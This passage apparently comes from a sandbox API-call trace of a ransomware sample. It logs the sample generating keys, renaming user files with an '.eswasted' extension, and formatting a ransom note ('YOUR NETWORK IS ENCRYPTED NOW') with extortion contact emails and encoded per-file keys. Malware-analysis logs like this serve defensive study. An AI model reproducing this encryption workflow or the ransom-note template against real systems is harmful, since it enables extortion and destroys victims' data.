Pictures\\Jellyfish.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0097.602] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0097.602] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xbd616 [0097.602] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd616) returned 0x16d0000 [0097.604] CloseHandle (hObject=0x10c) returned 1 [0097.778] UnmapViewOfFile (lpBaseAddress=0x16d0000) returned 1 [0097.787] CloseHandle (hObject=0x134) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.787] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0097.788] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.788] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.788] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0097.789] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0097.789] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.800] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.801] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rECuEBdU907V2VEIMGoZBw0iN0aXJY4wBXWo7uLX2ZVaDHFdPUhzdTD4loVNk3yY\r\nvDVdju5aIPf8gknlhQhaAsYTHLePv6XV1Vq2TFJWQ50CF4vO/L3+fLLxA82kv0ue\r\nzENntIzwrw9+6vp0PKfGomyseAVI6GiFsHC/tLhl97GcUeDNAWozgoZ1CnhErRGA\r\ngwOfD7gDEic7gEG88xCX2QF+M3hFr3cuh/8IgPU0qUt1Zm7Am6SxXdFyR4XQovZL\r\nF/PaoYtleXHScgciWSrMkquM3P7cj05Dxjybo3qQ/JYWRuekl9O1U2JTqbDqGqVO\r\n6qa/RMwds5X2MH7pF8iqieheEd3LVXJqb9E3CB9dFkXE9w/14vZ9mfw1RUgIlL4e\r\n7be8ZmWaZe42g1w9KjrfJ4AkWOftLJMR/kz+06f7RtPLHxct+kgmpav5ujWM2Jdo\r\nBdknJSYnquG6WV6055TpP8o5u1L6tBoPEjDjeIItzdSwPeKZ6OcRRPmNfSIM0FVl\r\nnoFSc5j9YtGMt1x4U4pnroj7h/GRSv0UTV7HkAghbnzooO3Qj71wavpjinyU2d3W\r\nn4RGL+cs0YIKn4Mn1LbmzrMKqdM5qV0lZwmcUSeKIDOPWRDXXiEPceI4YRNv2yx0\r\nKMiv+DJ39/oyUjKf86aLnJTVvdZm9ebR/doIDXkvjHE=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.801] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.801] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x114fe38, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0097.844] SetEndOfFile (hFile=0x130) returned 1 [0097.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.860] CloseHandle (hObject=0x130) returned 1 [0097.867] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0097.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724088 | out: hHeap=0x6d0000) returned 1 [0097.868] _aulldvrm () returned 0x0 [0097.868] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0097.869] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0097.869] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.869] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0097.869] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0097.869] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.869] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.869] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0097.870] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0097.870] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0097.872] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0097.873] SetEndOfFile (hFile=0x130) returned 1 [0097.874] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.874] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted")) returned 1 [0097.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0097.875] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0097.875] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xbde6b [0097.875] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbde6b) returned 0x1610000 [0097.875] CloseHandle (hObject=0x134) returned 1 [0098.015] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0098.020] CloseHandle (hObject=0x124) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0098.020] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0098.021] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0098.021] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.021] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0098.022] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0098.022] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0098.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0098.032] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FM2v9aSzLv62q5LQWdKrA6Wk3zngHNuXBbc+AsQ+uDP5bwbG8QStSgwo2ytapZlC\r\nAIFaV7dJ/Szyu55XaHA1uarOVXZWrx5Y2fkEru6fYcBTWVaG//FBohHHOgRrrvIg\r\nESWYToKrVwVMnOyQ56PGJktTGqdrqMHRuJHGnZMQoGZP1br7gtqeK+65pdpMSYhu\r\nd0/Mt/cWeGXKXUH79fbZDwXoRxN0thwlrwn3pBaSJHqV1ya/gEwfxdqoZ81ukLll\r\n6N0ez4CaM6y25mo6Y7W1x5HmhuoGCFawFiPWGXbRPN97HsMnET90sQR4f4fhc80K\r\ncAo1dVvM6Q4+NWJkxY1c4gkkYW8qffrIIzlXzOG8dDagRahUl9fv6w6eZJgcYF0m\r\nZ2bkvSFAVgXplwo2X3Bu5c4/tZQggVp6vd+3A9EGXH6Kj1p9B2IiJTI0FhtG245k\r\nDZunTozY5xU3x/VXP5yrT/iEnwiflu8GOGaOgiPGWyj7MWSMz3nqOvF1pLRPrbbG\r\njnyONj7jFWoroppTVF8Ak208MA0otKR8w5Dx+P2LjtDRIMStnInmVRdo4gJLkH5I\r\naFTxFCxqRDvl/qoCnzcE08NETA62PM+7u74g3P3hTUXgIMVWZWYDvlSPby3YebMT\r\nf7tO45CdQTlg7YOEXpjJbaypwsVLGrccskYGgECO55O=[end_key]\r\nKEEP IT\r\n") returned 990 [0098.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0098.033] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x114fe38, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0098.033] SetEndOfFile (hFile=0x130) returned 1 [0098.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0098.036] CloseHandle (hObject=0x130) returned 1 [0098.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0098.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724228 | out: hHeap=0x6d0000) returned 1 [0098.107] _aulldvrm () returned 0x0 [0098.107] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0098.108] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0098.108] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.108] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0098.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x6f5cc0 [0098.108] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0098.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0098.108] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0098.109] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0098.109] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted_info" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0098.193] WriteFile (in: hFile=0x124, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0098.195] SetEndOfFile (hFile=0x124) returned 1 [0098.195] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.195] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0098.195] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0098.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted")) returned 1 [0098.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0098.198] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0098.198] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x940000 [0098.198] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x940000) returned 0x1610000 [0098.199] CloseHandle (hObject=0x11c) returned 1 [0100.017] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0100.209] CloseHandle (hObject=0x130) returned 1 [0100.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0100.210] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0100.212] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0100.212] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0100.212] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0100.213] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0100.213] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0100.223] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0100.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0100.224] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LeAT7GXhSY9hNn6Y0BznbHBy55VbhJdTPZWl4c5hTCfs/4y/dSoVhdXNoT6cB83D\r\nAR5ASSB2PCnKQncf8gEtLI2SVvh+tRsQaKSK8pPe2Dg7apQd29nOAgOU0Xglp6aU\r\n40KW3FeThOE1eyOT4HdZuzSozAijAZW/T3tlrCXXpLKVo+U8sTNZlZyZxGCw1n85\r\nVn7yZiy82jCCz/tUzu7yHJZuoX4aV+DV8zpKQdG2oyEA9ivbY+kzM9wQtQLdME1i\r\nfo3JTLF9tBWdxHXZizbdVXLHNJ8qPRhUV2mQB4HhoV+Z/py5yhvICUtr6IYzQGLc\r\nZvx9MZcymvoCsAAxCLKbSIMFSRxyZC4wCnJiVD4QIC2G2S1yUT9f+tUkFIJjDLJm\r\nfdM+shNXjOAyAeOeggo8Bm2+6tCv6+n8JsBiez8mk6obBS6ueTP3c3kePp9Oj21g\r\nzHbttuhUg91CPvxplJYTnbUXSLULGeGLbZaIbUxFZ8AUEDdgu/T6bDWZJCzOjewt\r\nxMbpm/jX2iWupwKfbEIw8eiMDx8ml7bfACq6Pn0lG31ocpWeUXYxBAW4MAwdCSP1\r\nw5IjuA/5z9ZDFpnMa1DAdSKrEKxIE2D5U2P7skN+P1JPVrbd6wUAgSX0Ibbn9Whw\r\nnEMT4IRmH9gwiJohw8KRc2LI7KGNoTODXfBMBR2jv7u=[end_key]\r\nKEEP IT\r\n") returned 990 [0100.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0100.224] WriteFile (in: hFile=0x124, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x114fe38, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0100.225] SetEndOfFile (hFile=0x124) returned 1 [0100.227] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0100.227] CloseHandle (hObject=0x124) returned 1 [0100.231] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0100.232] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738c20 | out: hHeap=0x6d0000) returned 1 [0100.232] SetEvent (hEvent=0xfc) returned 1 [0100.232] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) Thread: id = 329 os_tid = 0xaa8 [0070.017] WaitForMultipleObjects (nCount=0x2, lpHandles=0x130ff80*=0xfc, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0070.027] ResetEvent (hEvent=0xfc) returned 1 [0070.028] _aulldvrm () returned 0x0 [0070.028] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x6f57c8) returned 1 [0070.029] CryptGenRandom (in: hProv=0x6f57c8, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.029] CryptReleaseContext (hProv=0x6f57c8, dwFlags=0x0) returned 1 [0070.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0070.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x70d040 [0070.029] lstrcpyW (in: lpString1=0x70d0de, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70d2f0 [0070.029] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x6f57c8) returned 1 [0070.030] CryptGenRandom (in: hProv=0x6f57c8, dwLen=0xa46, pbBuffer=0x70d2f0 | out: pbBuffer=0x70d2f0) returned 1 [0070.030] CryptReleaseContext (hProv=0x6f57c8, dwFlags=0x0) returned 1 [0070.030] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.033] WriteFile (in: hFile=0x124, lpBuffer=0x70d2f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70d2f0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.034] SetEndOfFile (hFile=0x124) returned 1 [0070.034] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d2f0 | out: hHeap=0x6d0000) returned 1 [0070.034] lstrcpyW (in: lpString1=0x70d0de, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted")) returned 1 [0070.036] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0070.036] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0070.036] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x61d [0070.037] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0x330000 [0070.037] CloseHandle (hObject=0x128) returned 1 [0070.772] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.793] CloseHandle (hObject=0x12c) returned 1 [0070.793] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70d548 [0070.793] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf20) returned 1 [0070.794] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x1b8, pbBuffer=0x70d590 | out: pbBuffer=0x70d590) returned 1 [0070.794] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.794] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf20) returned 1 [0070.795] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.795] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.825] SetEndOfFile (hFile=0x124) returned 1 [0070.828] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.828] CloseHandle (hObject=0x124) returned 1 [0070.831] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d040 | out: hHeap=0x6d0000) returned 1 [0070.831] 